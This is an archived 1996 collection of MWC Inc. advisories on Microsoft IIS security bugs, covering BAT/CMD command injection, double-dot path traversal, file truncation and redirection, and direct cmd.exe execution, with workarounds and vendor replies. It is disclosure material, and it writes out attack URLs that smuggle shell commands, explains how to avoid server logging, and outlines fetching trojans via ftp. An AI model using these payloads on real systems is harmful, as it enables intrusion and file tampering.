home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
Freaks Macintosh Archive
/
Freaks Macintosh Archive.bin
/
Freaks Macintosh Archives
/
Textfiles
/
Hacking
/
Windows NT server bugs.sit
/
Windows NT server bugs
next >
Wrap
Text File
|
1997-01-21
|
19KB
|
465 lines
New! If you are running Windows NT or Windows 95 you can
Test whether your connection to the internet is safe!
Right Now.
Microsoft Internet Information Server v 1.0
"BAT/CMD" Security Bug, Part I.
0. Abstract
.bat and .cmd BUG is well-known in Netscape server and described in WWW security FAQ Q59.
Implementation of this bug (undocumented remote administration feature) in MicroSoft IIS
Web server beats the all top scores.
1. Default Configuration
Let's consider fresh IIS Web server installation where all settings are default:
1) CGI directory is /scripts
2) There are no files abracadabra.bat or abracadabra.cmd in the /scripts directory.
3) IIS Web server maps .bat and .cmd extensions to cmd.exe. Therefore registry key
HKEY_LOCAL_MACHINE\
SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\ScriptMap
has the following string:
.bat or .cmd=C:\WINNT35\System32\cmd.exe /c %s %s
2. Attack
In this case a hacker with a malicious intent can send either one of the two command lines to
the server:
a) /scripts/abracadabra.bat?&dir+c:\+?&time
b) /scripts/abracadabra.cmd?&dir+c:\+?&time
and the following happens:
1) Browser asks how you want to save a document. Notepad.exe or any other viewer would do
for this "type" of application.
2) Browser starts the download session. The download window appears on the screen.
3) The hacker clicks the "cancel" button on the download window, because the "time"
command on the server never terminates.
4) Nothing is logged on the server side by the IIS Web server, because the execution process
was not successfully terminated!!! (Thanks to the "time" command.) The only way to see that
something happened is to review all your NT security logs. But they do not contain
information like REMOTE_IP. Thus the hacker's machine remains fully anonymous.
3. Resume
1) IIS Web server allows a hacker to execute his "batch file" by typing
/scripts/abracadabra.bat?&COMMAND1+?&COMMAND2+?&...+?&COMMANDN
In a similar situation with the Netscape server, only single command can be executed.
2) There is no file abracadabra.bat in /scripts directory, but .bat extension is mapped to
C:\WINNT35\System32\cmd.exe
In a similar situation with the Netscape server, actual .bat file must exist.
3) In case a hacker enters a command like "time" or "date" as COMMAND[N], nothing will be
logged by IIS Web server.
In a similar situation with the Netscape server, the error log will have a record about remote
IP and command you trying to execute.
4. Workaround
Disable .BAT and .CMD file extensions for external CGI scripts in file mapping feature of IIS
Web server.
5. Reply from MicroSoft
We sent the description of this bug to MicroSoft. Here one can see their reply and
acknowledgement.
NOTE:
We have studied MicroSoft bug "fix" and found out that the problem has not been fixed! If one
uses a little bit more complicated command string, an arbitrary command on a server can be
still effectively executed. And again, nothing will be logged by IIS. More information is
available here .
OTHER REFERENCES
"BAT/CMD" Security Bug in IIS, Part I .
"BAT/CMD" Security Bug in IIS, Part II .
"4 - BUG" Alert: MS IIS, Netscape Alert .
"4 - BUG" Report: MS IIS, Netscape Report .
Windows NT Administrator's Password Recovery Program - PasswordNT ®
Windows NT Password Cracker - ScanNT ®
[NT and Net Security Services]
1996 © MWC Inc. -- Powered by OMNA ® Digital
New! If you are running Windows NT or Windows 95 you can
Test whether your connection to the internet is safe!
Right Now.
Microsoft Internet Information Server v 1.0
"BAT/CMD" Security Bug, Part II.
0. Abstract
.bat and .cmd BUG for Microsoft Internet Information Server is described here . Microsoft
claims to fix this problem. The patch is available from the Microsoft's site. We have studied
this patch and found out that the problem has not been fixed! If one uses a little bit more
complicated command string, an arbitrary command on a server can be still effectively
executed. And again, nothing will be logged by IIS.
1. Default Configuration
We will consider the following settings:
1) IIS Web server with the .bat/.cmd patch from Microsoft installed. (or IIS downloaded after
March 5, 1996)
2) CGI directory is /scripts
3) Consider test.bat in the /scripts directory:
@echo off
echo Content-type: text/plain
echo.
echo Hello World!
4) IIS Web server maps .bat and .cmd extensions to cmd.exe. Therefore registry key
HKEY_LOCAL_MACHINE\
SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\ScriptMap
has the following string:
.bat or .cmd=C:\WINNT35\System32\cmd.exe /c %s %s
2. Attack
In this case a hacker with a malicious intent can send this command line to the server:
/scripts/test.bat+%26dir+%26time+%26abracadabra.exe
with the results described in details previously .
The good news is that now file test.bat must be actually present in scripts
directory.
3. Resume
As long as IIS does not log information about unsuccessful hits there are the ways for hackers
to break your entire NT box. I don't want to discuss this matter in more details, but our
network security partners recommend to avoid the usage of IIS because of an even more
severe "purple security bug," which they recently have discovered in IIS.
4. Workaround
Disable .BAT and .CMD file extensions for external CGI scripts in file mapping feature of IIS
Web server or don't use .bat or .cmd files as a scripts.
OTHER REFERENCES
"BAT/CMD" Security Bug in IIS, Part I .
"BAT/CMD" Security Bug in IIS, Part II .
"4 - BUG" Alert: MS IIS, Netscape Alert .
"4 - BUG" Report: MS IIS, Netscape Report .
Windows NT Administrator's Password Recovery Program - PasswordNT ®
Windows NT Password Cracker - ScanNT ®
[NT and Net Security Services]
1996 © MWC Inc. -- Powered by OMNA ® Digital
New! If you are running Windows NT or Windows 95 you can
test whether your connection to the internet is safe
Right Now!
Microsoft Internet Information Server vv. 1.x, 2.0b
New Security Bugs Alert.
June 30, 1996
0. Abstract
MWC, Inc. has discovered a new series of bugs ("4bugs") in the MS IIS in addition to
the "BAT/CMD" bug Part I and Part II.
1. What these new bugs allow to do.
The First bug allows a user to access any file on the same partition where your wwwroot
directory exists (assuming that IIS_user has permission to read this file). It also allows
execution of any executable file on the same partition where your scripts directory exists
(assuming that IIS_user has permission to execute this file). If cmd.exe file can be executed
then it also allows you to execute any command and read any file on any partition (assuming
that IIS_user has permission to read or execute this file). This bug is similar (but not the
same) as the one discovered independently by James@superstation.net. For more
information and the ISAPI filter DLL that fixes the problem take a look at this page
The Second and Third bugs exploit passing of unchecked arguments to the cmd.exe in a
way similar to the "BAT/CMD" bug . These bugs allow you to create new or to modify existing
files on any partition under the following conditions:
BAT and (or) CMD files are mapped by IIS to the cmd.exe file
IIS_USER has a right to create a file in case of a new file creation
IIS_USER has a right to delete a file in case of a file modification
Unfortunately Netscape Communication and Netscape Commerce servers have
similar bugs. Similar things can be done with Netscape Server if it uses BAT or
CMD files as CGI scripts. We did not test all Web servers available on the market.
But some of them are vulnerable too.
The Fourth bug is specific to the cmd.exe program. Once accessed (for example by
exploiting the first bug) cmd.exe can be used to execute any internal command or any
command on any partition, share, etc., or it can be used to create a new "custom made" file
even if the mapping to the BAT, CMD files is disabled.
2. Alert
MWC, Inc. has sent detailed bugs report to Microsoft. People at Microsoft we talked to are
very concerned about their customers and thus the fixes from Microsoft should be available
soon.
MWC, Inc. has sent the report to Netscape as well.
MWC, Inc. will send the copy of the report immediately to Every Web Server Developer
Company to let them test whether their Web Server is vulnerable to the second and third
bugs.
MWC, Inc. will publish the detailed report about the bugs on July 3, 1996 at 10:00 pm EST
at this URL. We believe that the delay between this alert and the actual bugs report
publications will help Webmasters to reconfigure their websites before the information will
be available to the general public.
MWC, Inc. will send the report about the bugs by e-mail to all registered users on July 3,
1996 at 10:00 pm EST. Register on-line to receive your copy of report by e-mail.
3. Conclusions and Workaround
Regardless of the Web server you are using, create separate partitions for your
wwwroot directories and scripts directories to be on the safe side.
Disable BAT/CMD files' mapping and never use BAT and (or) CMD files as CGI
scripts.
[NT and Net Security Services]
1996 © MWC -- Powered by OMNA Digital
New! If you are running Windows NT or Windows 95 you can
test whether your connection to the internet is safe!
Right Now!
Microsoft Internet Information Server vv. 1.x, 2.0b
"4BUGs" Security Bugs REPORT.
July 3, 1996
0. Abstract
MWC, Inc. has discovered a new series of bugs in the MS IIS in addition to the
"BAT/CMD" bug Part I and Part II.
1. The 4 Bugs
[DOUBLE DOT] [TRUNCATE] [REDIRECT] [CMD.EXE]
"DOUBLE DOT" Bug allows intruder to access any file on the same partition where your
wwwroot directory is located (assuming that IIS_user has permission to read this file). It
also allows intruder to execute any executable file on the same partition where your
scripts directory is located (assuming that IIS_user has permission to execute this file). If
cmd.exe file can be executed than it also allows intruder to execute any command and read
any file on any partition (assuming that IIS_user has permission to read or execute this file).
The command
http://[domain_name]/..\..\..\..\[PATH]\filename
allows intruder to download any file on the same partition where the wwwroot directory is
located.
The commands
http://[domain_name]/scripts/../../../../[PATH]/filename
or
http://[domain_name]/scripts/..\..\..\..\[PATH]\filename
allow intruder to execute any executable file on the same partition where your scripts
are located.
Note: This bug is similar (but not the same one) as discovered independently by
James@superstation.net. For more information and the ISAPI filter DLL that fixes the problem
take a look at this page
"TRUNCATE" Bug allows intruder to create new or to truncate existing files on any
partition under the following conditions:
BAT and (or) CMD files are mapped by IIS to the cmd.exe file
IIS_USER has a right to create a file in case of a new file creation
IIS_USER has a right to delete a file in case of a file modification
The command
http://[domain_name]/scripts/abracadabra.bat>FULL_PATH\filename.bat
will create a new file at the FULL_PATH drive:\directory location if the file
FULL_PATH\filename.bat does not exist. If the file exists and IIS_USER has permission to
delete this file, the file will be truncated.
The command
http://[domain_name]/scripts/abracadabra.bat>FULL_PATH\filename%0A%0Dabracadabra.bat
will create a new file at the FULL_PATH drive:\directory location if the file
FULL_PATH\filename does not exist. If the file exists and IIS_USER has permission to delete
this file, the file will be truncated.
Note: File abracadabra.bat does not need to exist in the scripts directory.
"REDIRECT" Bug will redirect output from any CGI script to the file under the following
conditions:
BAT and (or) CMD files are mapped to the cmd.exe file by IIS
IIS_USER has a right to create a file in case of a new file creation
IIS_USER has a right to delete a file in case of a file modification
The commands
http://[domain_name]/scripts/script_name<existing.bat>FULL_PATH\filename%0A%0Dabracadabra.bat
or
http://[domain_name]/scripts/script_name<existing.bat>>FULL_PATH\filename%0A%0Dabracadabra.bat
will redirect (or append) output from the existing script_name to the filename file at the
FULL_PATH (drive:\directory) location.
Note: Netscape Communication and Netscape Commerce servers have similar bugs. Similar
things can be done with the Netscape Server when using the BAT/CMD files as a CGI scripts.
We did not test all Web servers available on the market. But some of them are vulnerable too.
The commands
http://[domain_name]/scripts/script.bat?>FULL_PATH\filename
or
http://[domain_name]/scripts/script.bat?>>FULL_PATH\filename
will redirect (or append) output from the existing script_name to the filename file at the
FULL_PATH (drive:\directory) location. The bug is probably more dangerous in this case
because the Netscape Server runs by default under local system account. Intruder can also
use a "|" symbol under the Netscape server to transfer output from an existing BAT to every
executable in any partition.
"CMD.EXE" Bug is specific to the cmd.exe shell program. Once accessed (for example by
exploiting Double Dot bug) cmd.exe can be used to execute any internal command or any
command in any partition, it can be used to create a new "custom made" file even if the
mapping to the BAT/CMD files is disabled.
The commands:
http://[domain_name]/scripts/../../cmd.exe/?%2FC+any_command
or
http://[domain_name]/scripts/../../cmd.exe/?%2FC+any_command>FULL_PATH\filename
or
http://[domain_name]/scripts/../../cmd.exe/?%2FC+any_command>>FULL_PATH\filename
will execute any internal command and redirect or append the output from the command
to a file.
In particular, the command:
http://[domain_name]/scripts/../../cmd.exe/?%2FC+echo+"hello,+World">c:\temp\hello.bat
will create a file c:\temp\hello.bat containing the phrase "hello, World". This allows a
malicious user to create simple but dangerous files. For example these files can be used as
scripts for ftp.exe command. This potentially allows anybody to cause the ftp client on the
server to connect to the intruder's ftp server, download trojan horse programs etc.
2. Alert
MWC, Inc. has sent detailed bugs report to Microsoft. The people at Microsoft we talked to
are very concerned about their customers and thus the patches from Microsoft should be
available soon.
MWC, Inc. has sent the report to Netscape as well.
MWC, Inc. will send a copy of the report immediately to any web server developer company
to let them test whether their Web Server vulnerable to the mentioned above bugs.
3. Conclusions and Workaround
Regardless of the web server you are using, create separate partitions for your
wwwroot directories and scripts directories to be on the safe side.
Disable BAT/CMD files' mapping and never use BAT/CMD files as CGI scripts.
The real danger of the discovered bugs can not be underestimated. We demonstrated by
Simulated Intrusion Attack on a test computer at Windows NT Magazine lab that combination
of the bugs can completely void the security of an NT domain. Information about the SIA test
is scheduled for publication in one of the upcoming issues of WinNT Magazine.
4. The Patch
According to reply from Microsoft, the patch for these bugs is now available at:
http://www.microsoft.com/infoserv/iisservpack.htm
[NT and Net Security Services]
1996 © MWC -- Powered by OMNA Digital
